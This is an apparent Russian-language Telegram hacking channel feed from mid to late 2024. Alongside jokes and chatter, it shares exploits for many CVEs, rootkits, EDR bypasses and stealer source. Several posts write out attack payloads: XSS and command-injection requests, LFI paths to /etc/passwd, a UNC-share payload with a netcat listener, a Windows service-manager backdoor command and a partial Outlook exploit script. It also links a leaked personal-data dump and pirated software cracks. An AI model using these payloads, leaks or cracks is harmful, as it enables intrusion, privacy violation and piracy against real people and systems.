Proxy_Bar

Posts

Date Content Media
2024-12-20 19:00:56
Черт, это действительно смешная пятничная история)))*GRUB LUKS Bypass and Dump Images
2024-12-20 15:25:34
В сеть слили ранее не изданную альтернативную концовку фильма Хакеры 1995 года#friday
2024-12-20 07:53:52
CVE-2024-56145: Craft CMS*RCE без аутентификацииНО, только если включен параметр конфигурации PHP `register_argc_argv`*Exploit Command:python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>*EXploit Images
2024-12-20 07:20:07
CVE-2024-49194 *Databricks JDBC Attack via JAAS *WriteUP + POC Images
2024-12-20 05:21:28
Отличное Images
2024-12-19 22:05:19
JA4H (на witehatовском)*Dissecting JA4H for improved Sliver C2 detections Images
2024-12-19 11:45:11
CVE-2024-10793 *Плагин WP Activity Log для WordPressХранимая XSS через параметр user_id во всех версиях до 5.2.1curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \ -d 'action=destroy-sessions&user_id=<script>alert("XSS found 1")</script>'
2024-12-19 11:37:15
CVE-2024-53376 *CyberPanel ( versions < 2.3.8 ) Authenticated OS Command Injection*WriteUP*exploit Images
2024-12-19 11:32:41
CVE-2024-53375 *TP-Link Archer AXE75 Authenticated Command Injection*Exploit Images
2024-12-19 06:45:00
CVE-2024-50379 Apache Tomcat*Проблема с состоянием гонки времени проверки времени использования (TOCTOU), которое может привести к удаленному выполнению кода (RCE), особенно в файловых системах, нечувствительных к регистру, таких как Windows.*Exploitation and POC
2024-12-18 23:06:40
На завтра уже, споть*90-Day Cybersecurity Plan*Cloud Security Labs*linux-attack-forensics-purple labs Images
2024-12-18 16:06:42
Крутой разбор !!!*OtterRoot: Netfilter Universal Root 1-day Images
2024-12-18 10:21:37
Svartalfheim*Шелкодесы))Stage 0 Shellcode to Download a Remote Payload and Execute it in Memory*LinkUsage python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80 python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s
2024-12-18 09:57:05
Apache Struts2 CVE-2024-53677*POC+WriteUp Images
2024-12-18 09:24:43
CVE-2024-1086 Linux LPE*Exploit Images
2024-12-14 14:44:40
CVE-2024-38819*Spring Boot 3.3.4, based on Spring Framework 6.1.13 path traversal exploit*POC + docker
2024-12-14 12:55:31
Праздник к нам приходит !!!*Официальное лицо нового года\деда мороза\ёлки и фейерверка в уходящем 2024 - Яша добрый хакер.Большое спасибо за посылку !!! Книги огонь, круто !Жду тебя в сервеной столице 😎👌😁#friends #books #Xmas Images Images
2024-12-13 20:08:45
OpenBAS — это платформа с открытым исходным кодом, позволяющая организациям и проводить кампании и тесты по моделированию киберпреступлений.*Link Images
2024-12-13 13:25:01
PendingFileRenameOperations + Junctions EDR Disable*PendingFileRenameOperations позволяет приложениям создавать операции переименования файлов, создавая запись реестра в HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager. *Link#win #edr Images
2024-12-13 13:19:08
MyQ Print Server Unauthenticated RCE (CVE-2024-28059)*😆 Images
2024-12-13 11:01:52
Collection of Linux Rootkit codes *Link Images
2024-12-10 20:01:19
да быть не может, все же ок )))
2024-12-09 19:48:38
Мяу
2024-12-09 19:48:32
None Images
2024-12-08 10:04:06
Freeman/Freecat 😀
2024-12-07 21:45:30
CVE-2024-38144 *LPE vulnerability in Windows 11 due to Integer Overflow in ksthunk.sys*Перспективненько*WriteUp + exploitWriteUp + exploit 2 Images
2024-12-07 05:30:04
CVE-2024-41713*Mitel MiCollab Authentication Bypass to Arbitrary File Read*Exploit Images
2024-12-06 13:37:53
Группа Nanowar of Steel создала гимн Java, текст которого полностью состоит из кода*github.com/NanowarOfSteel/HelloWorld#metall #friday #party
2024-12-06 08:20:46
exit VIM (done) Images
2024-12-05 20:37:22
BootExecute EDR Bypass*Грузи малварь от ntdll.dll — до полной загрузки операционной системы Windows.Метод и правда старый и много где используется, всегда логика была в том что бы стартануть раньше AV\EDR и даже килять его (хуки там всякие и тд).*D0wnL0@d Images
2024-12-05 09:03:10
CVE-2024-51378 CyberPanel Command Injection*WriteUp*exploit Images
2024-12-05 08:51:49
CVE-2024-11680 ProjectSend r1605*Exploit Images
2024-12-04 20:34:42
Рубрика .git leaks*Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.Токены обеспечивают доступ к:108 707 репозиториям кода.2117 организациям/группам.*Список юзеров у которых увели токен с GitHubСписок юзеров у которых увели токен с GitLab*Ищем себя ))Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с Gi7w0rm , добряки ))) Images
2024-12-04 16:01:30
Channel photo updated
2024-12-04 08:27:28
CVE-2024-42327 / ZBX-25623*zabbix SQLi*POC Images
2024-12-03 17:33:20
Kernel (Linux) _#*В ядре Linux в системных вызовах exec существует проблема времени проверки/времени использования. Разрешения на выполнение проверяются в другое время, чем применяется бит set-user-ID. Это LPE.Есть два состояния бинаря (условно), которые должны быть безопасными:1. Бинарь имеет root-идентификатор + set-user-ID, но хакеру его не исполнить.2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.*А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успеть выпить таблетки*Proof of Concept#LPE #linux #ricecondition #kernel
2024-12-02 14:26:32
AWSUnauthorized Access to Metadata and User Data*Link Images
2024-12-02 02:18:33
CVE-2024-44308 Apple (Safari)*RCE *WriteUp + POC * Images
2024-12-02 02:10:02
fucking mondaysudo wget cofee_and_cat.shchmod +x cofee_and_cat.sh./cofee_and_cat.sh Images
2024-12-02 02:04:20
CVE-2024-11320 Pandora FMS*RCE exploit Images
2024-12-01 21:19:25
Linux Malware Development:Создание reverse shell на основе TLS/SSL на Python*writeUP*source: reverse_ssl.py Images
2024-12-01 03:45:23
Exploit-Street Улица Сезам* LPE exploits для Windows (2023\2024)*Link Images Images
2024-11-30 20:08:50
CVE-2024-44285 * panic iOS 18.0/18.0.1*POC Images
2024-11-30 16:09:43
bypass EDR*payloadhttps://&cmd/c\\\\192.168.2.15\\Public\\aa.batnc -lvnp 4444 + еще decimal можно
2024-11-30 06:57:26
XSS в 2024и смешно и грустно
2024-11-29 08:32:51
HellPot — это кроссплатформенный портал бесконечных страданий, предназначенный для наказания неуправляемых HTTP-ботов. 😁😄Описание ТОП )Link Images
2024-11-25 09:32:01
None Images
2024-11-25 06:40:24
Хуй с ним, пойду
2024-11-25 06:39:49
Такое
2024-11-25 06:39:40
None Images
2024-11-25 06:39:12
Болит пиздец
2024-11-25 06:38:44
None Images
2024-11-25 06:38:27
Болит
2024-11-25 06:38:21
Блять руку
2024-11-25 06:37:42
Возьму
2024-11-25 06:37:29
Щас
2024-11-24 18:38:48
MacOS Stealer*source code Images
2024-11-23 08:02:24
XOR Encrypted Shellcode Execution via Desktop Enumeration*Link Images
2024-11-16 21:01:07
С днем рождения !!!!Сегодня Proxy Bar исполняется 3 года ***Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:# был перестроен чат# набралась команда админов (хорошие специалисты и прекрасные люди)# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)*Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:заходите на proxy-bar.org там есть краткое описание, из основногоэто секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека *С праздником, и Вас и Нас ! 😜*Если Вам нравится то что мы делаем, Вы можете нас поддержать:***Donate:Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker#lденьрождения #админы #всевсевсе
2024-11-15 18:54:19
CVE-2024-47575 FortiManager*Удивительно быстро ушел push, да еще и заапрувили в metasploit-frameworkНо так или иначе модуль есть, жми msfupdate ))*Pull Req#fortinet #metasploit Images
2024-11-15 12:52:44
Шифруем payload с помощью алгоритма DFC (Decorrelated Fast Cipher)*WriteUP SourceCode Demo Images
2024-11-15 05:14:23
С пятницей !Тут недавно кикнули канал клуба 1337 Мы уж не будем вдаваться в подробности кто и за чем и при чем тут закрытый чат канала, а просто скажем что состоялся ReBorn и это хорошо.Поэтому заходите:Телега: club31337Твиттер (X): club31337 Images
2024-11-14 09:11:37
Zero-Day CVE-2024-43451 One click*Прикольно конечно, идешь так по URL на сайт правительства (lol 1) Украины (lol 2) для получения академических сертификатов, клац правой кнопочкой и получаешь модный URL на 0Day.А кто ходит на сайт правительства Украины за сертификатами ? Правильно - украинские организации. Ну дальше все понятно.В зайце — утка, в утке — яйцо, в яйце игла — смертьZIP, а в нем PDF, диплом и URL, где URL дергает сплоит и уводит на C&C кого надо.А надо видимо господам из UAC-0194 )))) Images
2024-11-12 20:52:34
Citrix Virtual Apps and Desktops (XEN)* Unauthenticated Remote Code execution*exploit
2024-11-12 03:58:52
CVE-2024-50340 - Adapted EOS Exploit*CVE-2024-4985 / CVE-2024-9487 - GitHub Enterprise SAML Authentication Bypass exploit Images
2024-11-12 03:21:36
С днем рождения DAMAGELAB / XSS20 лет как никак 😎 Images
2024-11-11 15:50:20
From Tito to Stalin*An In-Memory Rootkit For Linux*Tito Images
2024-11-11 12:05:22
SQLMap Command Generator Images
2024-11-10 15:27:59
Telegram-Android*Partisan-style. source Images
2024-11-10 01:37:34
sshd CTF*Крутая CTF с нашумевшим XZ Utils backdoor.Все в наличии: liblzma, шеллкодесы, encrypt/decrypt и вот это вот все.*ТЫЦ#ctf Images
2024-11-04 22:44:10
с прадздником
2024-11-04 22:43:58
ну с где ГРУмало кто читает, и сегодня 40 лет назад мы штурманули один замок, меч взяли и уронили НФЕФТЬ
2024-11-02 03:54:07
Ну что, мыловары, с праздником ! 😎#2nov1988 Images
2024-11-01 04:08:01
CVE-2024-39205*Pyload (работающий под управлением Python3.11 или ниже) уязвим к RCE*Exploit Images
2024-10-31 19:13:19
Вот это круто я считаю !*RAM симуляторРеализовано show_memory_stats - а значит мы будем знать какие фреймы заняты, а значит можно тестить всякую защиту и\или малварь, всякие атаки типа RowhammerКстати статья по теме: Exploiting the DRAM rowhammer bug to gain kernel privileges#Wow Images
2024-10-31 11:46:31
LooooLФэйк сразу и на Ачат и на XSS. Images
2024-10-31 08:25:10
Быстрый поиск RDP по аутлуку*Распространенная практика рассылать креды\ssh\rdp\etc в рамках корпоративной почты*\\Content\.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$или \AppData\Local\Microsoft\Windows\\Content.Outlook\.rdp Images
2024-10-30 15:44:05
Windows 11 23H2 LPE*Уязвимость в драйвере Common Log File System (CLFS) *WriteUp и Сплоит Images
2024-10-30 07:45:27
CyberPanel 2.3.6 pre-auth RCE *writeUP*POC exploit Images
2024-10-30 07:38:21
Xlight SFTP server <= 3.9.4.2*POC exploit
2024-10-27 23:32:29
bbyPASS windows
2024-10-26 20:41:05
уж как есть
2024-10-26 20:40:58
но
2024-10-26 20:40:55
оба плохие
2024-10-26 20:40:35
есть 2 варианта
2024-10-26 20:39:37
надо думать
2024-10-26 20:39:25
я серьезно
2024-10-26 20:38:23
нельзя днрэать это все в одглно
2024-10-26 20:37:44
то
2024-10-26 20:37:37
грпппу и всю этц хуйнцю
2024-10-26 20:37:15
если я аидат
2024-10-26 20:36:55
илья
2024-10-26 20:36:39
@e
2024-10-25 12:12:23
Падонки, изменники, вероотступники !VIM для вас какая то шутка что ли ?Свят Свят и присвятой !q Images Images
2024-10-23 15:43:56
CVE-2024-46538*PfSense Stored XSS lead to RCE*POC exploit
2024-10-22 07:55:52
Доброго утра.*напоминаем, что у нас стартовал небольшой конкурс*Если у Вас есть идеи - добро пожаловать 👌
2024-10-21 04:13:52
Microsoft Windows Flaw: CVE-2024-30090*read wtf*POC exploit#win #lpe
2024-10-20 20:25:32
Новое о старом. LD_PRELOAD в наличии*bedevil: Dynamic Linker Patching#rootkits Images
2024-10-20 15:42:57
CVE-2024-9264 Grafana*exploit
2024-10-17 21:54:48
поесть
2024-10-17 21:54:45
сходить
2024-10-17 21:54:40
надо
2024-10-17 17:21:35
свято
2024-10-17 00:34:22
разделите 2 на 3 )))))))))))))))))))))
2024-10-16 17:11:58
чисто на на продажу2 сплоита на ВЕБ и на я дро
2024-10-14 11:28:48
vmw-logger-rs*Использует недокументированный встроенный бэкдор для взаимодействия гостевого хоста с поддержкой no_std.*Link
2024-10-13 20:47:36
CVE-2024-9464*уязвимость внедрения неаутентифицированных команд*Exploit Images
2024-10-13 17:50:14
The Sweet16 – the oldbin lolbin called setup16.exe*Этот вот setup16.exe со времен кайнозоя, в ХП уж точно был, ну как говорится old dog, new tricks*Link
2024-10-13 13:13:22
Chaos-Rootkit*widows x64 Ring 0 rootkit*возможности скрытия процессов, повышения привилегий, защиты и снятия защиты процессов, а также ограничения доступа к файлам, за исключением процессов из белого списка. *link#win #rootkit Images
2024-10-13 13:09:03
CVE-2024-42640*Unauthenticated Remote Code Execution via Angular-Base64-Upload Library *exploit
2024-10-07 05:19:32
видимо нужно куда иддти позавтравкать
2024-10-06 20:40:33
su/sudo/root)))) Images
2024-10-05 10:23:03
WoW !!!!https://protocell.xyz/Примерно так видится киберпанк ГибсонаДвигайте кирпичи в центре до 100%#cyberpunk #awesome Images
2024-10-05 06:36:28
CVE-2024-45409*GitLab - SAML Authentication Bypass*Патч уже есть, но все же.Процесс ворования cookie + nuclei template*id: CVE-2024-45409nuclei template
2024-10-05 06:13:11
Мы уже публиковали по поводу CVE-2024-45519 - Zimbra*Но, вот отличный Postjournal Exploit + руководство как настроить стенд что бы поиграться со сплоитом и далее повышать привилегии (либо в бок уходить)*zimbra.labo Images
2024-10-05 05:52:47
Завтракаем
2024-10-04 20:35:44
CVE-2024-26304 RCE-exploit*HPE Aruba Device*usage:python3 CVE-2024-26304.py -u http://127.0.0.1
2024-10-04 11:46:53
TeamViewer *From User to Kernel Elevation of Privilege*CVE-2024-7479 и CVE-2024-7481*POC exploit, детали, видео#кайзерСозэ Images
2024-10-04 04:54:28
UBUNTUводы тут ? *в PAM модуле дырка, в su, sudo и ssh (значит сетевой вектор присутствует)* PAM module may allow accessing with the credentials of another user#ubuntu #PAM
2024-10-03 17:57:25
suqo ))))) Images
2024-10-02 19:49:52
CVE-2024-29050 Windows Cryptographic Services RCE*X509_ASN_ENCODINGPKCS_7_ASN_ENCODINGи вот это вот все*Статья + POC exploit Images
2024-10-02 17:15:26
DOCKER# Privilege Escalation*From normal to R00T user using this simple technique !#dicker Images
2024-10-02 16:33:02
CVE-2024-38200 Microsoft Office NTLMv2 *exploit
2024-10-02 15:50:02
CVE-2024-38816 Spring Framework*exploit
2024-10-02 05:31:18
CVE-2024-36435*RCE Flaw in Supermicro BMC IPMI Firmware*WriteUp*POC exploit#servers #ipmi #rce
2024-10-01 19:59:07
CLOUDFLARE BYPASS<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> Images
2024-10-01 05:29:01
Ретро из 2000 года !*Можно заDOSить Win95, Win98, Win98sr2, WinNT4*Link#cool #blablaAbout Images
2024-09-30 07:23:34
CVE-2024-26808 *Local Privilege Escalation Risk in Linux*WriteUp*Exploit#linux #lpe Images
2024-09-29 22:24:03
LOLESXi *Living Off The Land ESXi Images
2024-09-29 09:35:40
CVE-2024-45519 *SMTP exploit
2024-09-26 17:23:42
Пипец
2024-09-22 06:53:01
Пойду додожгу Images
2024-09-22 06:50:41
@
2024-09-22 05:41:17
пойду кусок пиццу съем на завтрак
2024-09-20 16:35:13
API routes fuzzing*WordlistsЮр лицо представили ? #*_0 Images Images
2024-09-19 15:05:03
Скрытие (и раскрытие) процессов Linux**1. Hiding Linux Processes with Bind Mounts*2. The 'Invisibility Cloak' - Slash-Proc Magic#linux #hacks Images
2024-09-19 05:17:54
Хакер хакера поневоле брат *Уязвимости в популярных\opensource СС\С2 фреймворках* Images
2024-09-18 13:47:08
Побег из KVM*writeUP - trojan-turtles*exploit Images
2024-09-17 19:33:56
Умели раньше в сплоиты !*CVE-1999-1587 - Solaris 8, 9* Images
2024-09-17 19:12:27
CVE-2024-23692 RCE*Rejetto HTTP File Server*exploit Images
2024-09-17 05:24:47
CVE-2024-38080 Hyper-V 1-Day*WriteUp*POC exploit#hyper-v Images
2024-09-16 17:35:14
А Вы читали библию сегодня ? *Malcore Malware Bible#malware Images
2024-09-16 13:12:52
CVE-2024-40711 Exploit Veeam backup and Replication*WriteUp*Pre-Auth exploit#veeam #rce
2024-09-15 06:43:42
CVE-2024-8504 и CVE-2024-8503*SQLi and RCE - VICIdial*Exploit Images
2024-09-14 19:58:26
BEAR-C2*Мишка - это компиляция скриптов C2, полезных данных и стейджеров, используемых в симулированных (?) атаках российскими группами APT.DownLoad#мишка #C2 Images
2024-09-13 15:48:09
LoL )))reCAPTCHA Phish
2024-09-09 09:59:42
Легальный и малозаметный LPE backdoor в WiNd0z*Разрешаем удаленное использование Services.mscsc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)sc.exe sdset scmanager D:(A;;KA;;;WD)#win #backdoor Images
2024-09-06 10:26:17
Хакерский митап SPbCTF × Яндекс*Где: в питерском офисе Яндекса БЦ БенуаКогда: 21 и 22 сентября*Расписание и доклады: глянуть тут*Что бы прийти ногами или получить линк на онлайн трансляцию - пройти регистрацию ТУТ#spb #yandex #ctf #hacks #party Images
2024-09-05 18:56:44
None Images
2024-09-05 13:35:57
CVE-2024-20017 Zero-Click Exploit Wi-Fi Chipsets*CVSS 9.8*Отличный разбор:4 exploits, 1 bug: exploiting cve-2024-20017 4 different ways*Сам Exploit Images
2024-09-05 11:28:55
CVE-2024-24401 NAGIOS *Authenticated SQL Injection*POC exploit Images
2024-09-02 08:47:15
SUDO_KILLER*Скрипт под:Сбор учетных данныхНеправильные конфигурацииОпасные двоичные файлы (GTFOBINS)Уязвимые версии sudo — CVEУязвимость Sudo и неправильная конфигурация, связанные с 3dPartyОпасные переменные окружающей средыДоступные для записи каталоги, в которых есть скриптыДвоичные файлы, которые можно заменить/переместить*Download + много демо + докер для тестов#sudo
2024-08-31 16:02:42
Прекрасное в мире плагинов WordPress*simple-image-manipulator/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwdactivehelper-livehelp/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&amministrazione-aperta/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwdanti-plagiarism/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ebuddypress-component-stats/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwddzs-videogallery/wp-content/plugins/dzs-videogallery/admin/upload.phpe-search/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Efancy-product-designer/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.phphd-webplayer/wp-content/plugins/hd-webplayer/playlist.phplocalize-my-post/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
2024-08-30 18:28:13
CVE-2024-6670 WhatsUp Gold*Статья Exploiting Pre-Auth SQL Injection in WhatsUp Gold*POC exploit Images
2024-08-30 10:03:21
CVE-2024-43044 Jenkins *WriteUP*POC exploit#jenkins
2024-08-29 12:05:56
wow*c/asm
2024-08-29 10:17:32
CVE-2024-5932 *WordPress GiveWP POP to RCE*POC exploit Images
2024-08-28 11:31:39
Лохматый научился включать свою любимую тапалку с мышками на айпадеСкоро рутанет
2024-08-28 09:50:02
CVE-2024-38063 (RCE in tcpip.sys) *POC exploit
2024-08-26 10:34:34
Nuclei templates*6000 штук
2024-08-25 07:55:52
#FreePavel Images
2024-08-24 09:29:19
CVE-2024-28000*WordPress, дырка в плагине LiteSpeed Cache (слабая проверка хэша)LPE без аутентификации во всех версиях плагина WordPress до 6.3.0.1*POC exploit Images
2024-08-23 16:45:36
ShellGen*Павашэлл скрипт для генерации ShellCode в различных форматах.Форматы: Raw, ps1, Hex, C, vba, csharpАрхитектура: x64, x86*DownLoad Images
2024-08-23 08:25:46
Реверс-инжиниринг и эксплуатация терминалов бесконтактной оплаты*Слайды тутВидео тут Images Images
2024-08-21 14:14:03
None
2024-08-20 14:45:05
NationalPublicData - BD *2,7 млрд записей информацией на жителей США*National Public Data — шарага, которая собирает жирные объемы приватной инфы, а потом продает, как в медиа так и по запросу. Там и проверка записей из криминальной базы сШа и составление биографических отчетов.*Пасс на архив https://usdod.io/ если тянуть с https://usdod.io/UPDATE magnet:?xt=urn:btih:3caa71f3ec8cbccc6fca4feb7185da2bab149ba7&amp;dn=NPD&amp;tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce#bd Images
2024-08-20 05:14:02
CVE-2024-7928 FastAdmin*Обход каталога и попытка вытащить креды БДДо версии 1.3.3.20220121*POC Images
2024-08-20 04:59:54
Phrack*read stuff Images
2024-08-19 19:44:38
Полезный однострочник для рекурсивного фаззинга-dirsearch -l urls.txt -econf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt#saveIt
2024-08-18 19:55:19
CVE-2022-24834 Redis*Затронуто:7.0.0 ≤ version < 7.0.126.2.0 ≤ version < 6.2.132.6.0 ≤ version < 6.0.20*Большой разбор + PoC exploit RCE*VideoPOC#redis #rce Images
2024-08-18 18:27:40
Я так понимаю, если план А не сработает, следующий Pwn2Own будет в Медельине 😎#humor #pwn
2024-08-18 09:20:04
Навечно в AD*Часть 1Часть 2Часть 3#activedirectory #persist Images
2024-08-18 05:46:44
Свято место ipV6 пусто не бывает*Громкие дыры, такие как CVE-2024-38063 рожают фэйковые сплоиты.*Про песочницы говорить нужно ? А еще мне нравится слово DEMO и главное форков сделали, даже issue открыли, кто баг репорт написал на троян )) 😂#TCPмоёIp Images Images Images
2024-08-17 15:07:23
Выбирай кого поздравлять, юзернейм !Wazawaka 32Robert De Niro 81(все фото заряжены на ransomePAtry) Images Images
2024-08-16 05:20:37
BYOB (Build Your Own Botnet) Unauthenticated RCE*writeup + video*Exploit Images
2024-08-15 15:24:02
Напоминаем по ЦЦ24 и 25 августа 2024 года в Санкт-Петербурге снова состоится компьютерный фестиваль Chaos Constructions.*Вход на фестиваль - свободный и бесплатный (с выходом сложнее)*Расписание на 2 дня тут*Запись на турнир по DOOM II: Hell on Earth:рега в 15:00, а сам турнир в 16:00*Копирование материалов - приветствуется!#CC #ЦЦ Images
2024-08-13 19:51:22
Материалы Defcon и Black Hat 2024*defconBlackHat Images
2024-08-13 05:43:36
Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!*Или почему индеец пахнет гавной*Занятный writeup в котором:3 types of Confusion Attacks 9 new vulnerabilities20 exploitation techniques*BlackHat 2024 PDFLink#apache Images
2024-08-13 05:17:23
Платформа Logsign Unified SecOps*CVE: CVE-2024-5716 to CVE-2024-5722 и CVE-2024-5716 CVE-2024-5717*RCE + ByPass (+ шаблоны nuclei)*POC exploits Images
2024-08-10 09:07:37
IDA PRO генератор лицензий*Все платформы*1. редактируем владельца лицензии, можно на ololo.ru регнуть2. поместить ida/ida64 dll/so/dylib в тот же каталог, что и скрипт.3. запускаем скрипт для генерации лицензии4. копируем сгенерированную лицензию и заменяем dll на пропатченные5 profit*Link на скрипт если удалят то Link на скрипт_2#ida #hex Images
2024-08-09 19:00:44
Поднимем ставки !*ArchLinux SpeedRun PS про Gentoo тоже есть ))😁
2024-08-09 18:44:13
Олимпийские игры в Париже ? Отстой ! 🤮Мы за SpeedRun по активации windows ! 👍
2024-08-09 05:41:06
CVE-2024-21683 0-click RCE*Затронуты версии от Win server 2000 до Win server 2025*Дырка в службе лицензирования удаленных рабочих столов Windows (RDL), в инет сейчас торчит 170 000 таких хостов *Пропатчено в июле*Exploit (репозитории банят, но мы скачали)))#rce #winsrv Images
2024-08-08 12:09:26
None Images
2024-08-08 12:09:25
None
2024-08-08 12:09:12
Ultimate Hardware Hacking Gear Guide*PDF 170 страниц#hrdwr
2024-08-08 11:29:21
Bug Bounty hunting КУРС*download Images
2024-08-07 19:28:45
GhostWrite уязвимость CPU*Ну если совсем коротко то: атака нарушает все что можно, песочница/контейнер/виртуальные машины.GhostWrite записывает и читает произвольную физическую память на затронутых ЦП RISC-V*ЗаБилдить:gcc -march="rv64gvzve64x" ghostwrite.c -o ghostwrite*POC exploit*WriteUp wtf#kernel #cpu
2024-08-07 12:59:55
#lain Images
2024-08-07 05:33:25
CVE-2024-6782 *Caliber 6.9.0 ~ 7.14.0 remote code execution*exploit
2024-08-06 14:33:02
Apache OfBiz vulns *Полный набор: POCов, RCEёв, CURLов, Burpсьютов(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)*// lInK*/#apache Images
2024-08-05 20:44:20
бггsystemctl --revert-mylast-fuckup#MUhumor Images
2024-08-05 15:13:26
SmartScreen - четыре новых метода по демонтажу*writeUP*repo
2024-08-05 05:22:01
Атака на EDR*Часть 1Часть 2Часть 3#edr Images
2024-08-04 16:40:53
Linux для пращуров и внуков и пенсионеров*OSEDUCONF - 2022 год*глянуть#real_bad_ass Images
2024-08-03 19:01:18
SLUBStick - атака на кэш ядра linux*Суть атаки сводится к перекрестному кэшированию ядра, перетекает из limited heap в возможность произвольного чтения и записи в памяти (а это LPE и escape docker).Затестили на: ядра 5.9 и 6.2 _ x32/x64Но то ладно, интересно другое, использовались 9 CVE -)Но то ладно, защита ядер SMEP/SMAP/KASLR - в упор не видят атаки -)*В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit*За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения*Жирный хрустящий slubstick.pdf#linux #vuln Images
2024-08-03 16:32:03
А вы читали когда либо спецификации на C&C ? 👍*Документ серьезный, даже RFC присутствует*Open Source C&C Specification
2024-08-03 06:31:36
shadow-rs*Windows Kernel Rootkit*Лангуаге: RUST*link #rootkit #windows #rust Images
2024-08-03 05:58:51
#history #humor Images
2024-08-02 15:10:52
Windows AppLocker Driver (appid.sys) *LPE*exploit#windows #lpe
2024-08-02 09:44:32
JetBrains Keys*Ключи истекают 14 сентября 2026 г.*ВСЕ ПРОДУКТЫ !!!*Link Images
2024-08-01 19:08:17
CVE-2024-36401 GeoServer*POC мы уже публиковали, но тут прям fullH0use*Полный exploit + модуль для Mass Scanning*Download exploit Images
2024-08-01 08:33:13
WhatsApp extension manipulation*Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.Когда там последний zeroClick был, 2 года назад ? )*POC#FU
2024-08-01 08:23:52
CVE-2024-7120 RAISECOM Gateway Devices*WriteUp*Exploit command injectioncurl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \ -H 'Accept: */*' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Connection: keep-alive' Images
2024-07-31 19:34:23
Прекрасное 🤣#nightHumor Images
2024-07-31 05:40:25
TuDoor*Только не королевская династия, я скорее династия DNS.В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.Слово за слово, все скатилось к перечитыванию RFC и трудов Дэна Камински (мир праху его), основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.Ну и как водится дочитались до дыр в BIND, PowerDNS и Microsoft DNS и всего сопутствующего.*Рекомендую к осмыслению саму страничку и линки внизу.Среда чюваки #DNS #DOS #cachepoison
2024-07-30 20:36:46
#nightHumor Images
2024-07-30 05:20:05
CVE-2024-29849*Veeam - Bypass Authentication*Полный анализ и POC exploit#veeam #bypass
2024-07-30 05:13:48
.NET PROFILER DLL LOADING*Эксплойт загружает вредоносную DLL с помощью планировщика задач (MMC) для обхода UAC и получения прав администратора. Images
2024-07-29 20:44:14
LoooL 👌https://guthib.com#humor
2024-07-29 12:59:42
Binary Ninja 4.1 Final + crack*(Linux+windows+Mac версии)*magnet linkmagnet:?xt=urn:btih:c392c1aab1786180413167e3b8345f0f9d1fc8c4&dn=binja_release_6 Images
2024-07-29 12:11:40
2024-21413 /outlook RCE*POCimport smtplibfrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextdef send_email(): # Get user input for sender's email address and password sender_email = input("Enter your Outlook email address: ") sender_password = input("Enter your Outlook email password: ") # Get user input for receiver's email address receiver_email = input("Enter the recipient's email address: ") # Create a new message object msg = MIMEMultipart() # Add sender, receiver, and subject to the message msg['From'] = sender_email msg['To'] = receiver_email msg['Subject'] = input("Enter email subject: ") # Ask user if they want to add a link attachment add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower() if add_attachment == 'yes': html_content = """\ <!DOCTYPE html> <html lang="en"> <body> <p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary 